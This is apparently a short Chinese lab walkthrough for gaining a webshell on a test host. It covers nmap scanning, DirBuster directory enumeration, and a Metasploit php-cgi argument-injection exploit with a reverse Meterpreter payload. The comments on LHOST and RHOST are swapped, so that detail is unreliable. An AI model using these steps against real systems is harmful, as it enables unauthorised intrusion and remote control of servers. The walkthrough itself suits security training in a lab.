目的
利用phpMyAdmin漏洞上傳mua程序,獲得webshell.
環(huán)境
步驟
- nmap掃端口(查看80端口是否開(kāi)了):
nmap -sV 192.168.1.3
- 瀏覽器地址欄輸入:
http:\192.168.1.3
訪問(wèn)目標(biāo)網(wǎng)站. - 命令
dirbuster
打開(kāi)OWASP DirBuster軟件對(duì)目標(biāo)網(wǎng)站掃描. - 在Target URL處輸入
http://192.168.1.3
,在File with list of dirs./file
出選擇字典文件.單擊start開(kāi)始掃描. -
掃描結(jié)果顯示包含cgi-bin目錄\phpmyadmin目錄等.
- 利用metasploit攻擊目標(biāo)主機(jī):
6.1 打開(kāi)msfconsole之后,輸入search php-cgi
,搜索php_cgi的相關(guān)工具和攻擊載荷.
6.2 輸入use exploit/multi/http/php_cgi_arg_injection
,啟動(dòng)漏洞利用模塊,提示符就會(huì)提示進(jìn)入到該路徑下.
6.3show payloads --> set PAYLOAD php/meterpreter/reverse_tcp --> show options(顯示攻擊模塊需要設(shè)置的參數(shù)) --> set LHOST 192.168.1.2(目標(biāo)主機(jī)ip,用于會(huì)話反向鏈接) --> set RHOST 192.168.1.3(源主機(jī)ip) --> exploit --> ls